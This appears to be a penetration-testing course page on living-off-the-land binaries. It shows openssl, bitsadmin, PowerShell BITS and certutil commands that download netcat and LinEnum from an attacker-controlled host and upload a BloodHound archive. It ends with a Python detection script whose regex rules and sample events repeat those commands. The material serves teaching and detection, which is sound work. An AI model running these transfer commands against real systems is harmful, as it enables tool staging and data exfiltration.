Also known as Living off the Land binaries (LOLBins): legitimate, usually signed binaries already present on a system that an attacker can repurpose for actions beyond their original intent, such as file transfer or code execution, while blending in with normal administrative activity.

Two reference sites catalogue them:

  • LOLBAS Project for Windows binaries (https://lolbas-project.github.io/)
  • GTFOBins for Linux binaries (https://gtfobins.github.io/)

They can be used to perform actions like:

  • Download
  • Upload
  • Command Execution
  • File Read
  • File Write
  • Bypasses

GTFOBins

On GTFOBins we can filter for binaries with download and upload capabilities by searching for +file download and +file upload.

One such binary is openssl, which can act as both a TLS server and a TLS client. We first need to create a self-signed certificate and start a server on our attack box; the compromised machine then connects and writes whatever the server sends to a local file.

Create Certificate in Pwnbox

openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Stand up the Server in our Pwnbox

openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

Then, from the compromised machine, connect to the server and redirect its output to a file.

Download File from the Compromised Machine

openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

Other LOLBin tools

Bitsadmin download

The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares.

File download with bitsadmin

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Download (PowerShell BitsTransfer module)

Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"

Upload (PowerShell; the receiving side must be a BITS-enabled IIS endpoint, and a proxy can be specified if the host is behind one)

Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql

Certutil

A de facto wget equivalent on Windows. Note that the Antimalware Scan Interface (AMSI) detects the following as malicious certutil usage:

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe
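From the defender's side, every transfer technique on this page (openssl s_client, bitsadmin, Start-BitsTransfer, certutil) leaves a process-creation record whose command line is the most reliable thing to alert on. The script below is an added example written for this page, not code from GTFOBins, LOLBAS or HTB: it runs a small rule set over constructed process-creation events (the field names host, user, image and cmdline are assumptions standing in for Sysmon Event ID 1 / Security 4688 / auditd fields) and extracts the remote endpoint for triage. The MITRE ATT&CK IDs are the real ones for Ingress Tool Transfer (T1105) and BITS Jobs (T1197).

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 /
# auditd EXECVE style); only the fields the rules need are included.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "INLANEFREIGHT\\svc-sql",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe"},
    {"host": "WS01", "user": "INLANEFREIGHT\\svc-sql",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer n http://10.10.10.32/nc.exe C:\\Temp\\nc.exe"},
    {"host": "WS02", "user": "INLANEFREIGHT\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c Import-Module bitstransfer; Start-BitsTransfer "
                "-Source \"http://10.10.10.32/nc.exe\" -Destination \"C:\\Temp\\nc.exe\""},
    {"host": "SRV01", "user": "root", "image": "/usr/bin/openssl",
     "cmdline": "openssl s_client -connect 10.10.10.32:80 -quiet"},
    # Benign uses of the same binaries, which the rules must not flag.
    {"host": "WS02", "user": "INLANEFREIGHT\\jdoe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -dump C:\\certs\\server.cer"},
    {"host": "SRV01", "user": "root", "image": "/usr/bin/openssl",
     "cmdline": "openssl x509 -in certificate.pem -noout -text"},
]

# (rule name, compiled regex over the command line, ATT&CK technique).
# A shell redirection such as "> LinEnum.sh" is handled by the parent shell and
# never appears in the child's command line, so the openssl rule does not
# require one; s_client pointed at a remote host:port is suspicious on its own.
RULES = [
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s.*-(urlcache|verifyctl)\b.*https?://", re.I), "T1105"),
    ("bitsadmin_transfer",
     re.compile(r"bitsadmin(\.exe)?\s+/transfer\b", re.I), "T1197"),
    ("powershell_bits",
     re.compile(r"\bStart-BitsTransfer\b", re.I), "T1197"),
    ("openssl_s_client",
     re.compile(r"openssl\s+s_client\b.*-connect\s+\S+", re.I), "T1105"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
CONNECT_RE = re.compile(r"-connect\s+([^\s\"']+)", re.I)


def remote_endpoint(cmdline):
    """Return the URL or host:port the command talks to, for analyst triage."""
    m = URL_RE.search(cmdline)
    if m:
        return m.group(0)
    m = CONNECT_RE.search(cmdline)
    return m.group(1) if m else None


def detect(events):
    """Apply RULES to each event; first matching rule wins, one finding per event."""
    findings = []
    for ev in events:
        for name, pattern, technique in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append({
                    "rule": name,
                    "technique": technique,
                    "host": ev["host"],
                    "user": ev["user"],
                    "remote": remote_endpoint(ev["cmdline"]),
                    "cmdline": ev["cmdline"],
                })
                break
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['rule']:<19} {f['host']} {f['user']} -> {f['remote']}")
```

In production the same rules map directly onto a SIEM query over the command-line field; the remote endpoint is what you pivot on to find every other host that reached the same staging server.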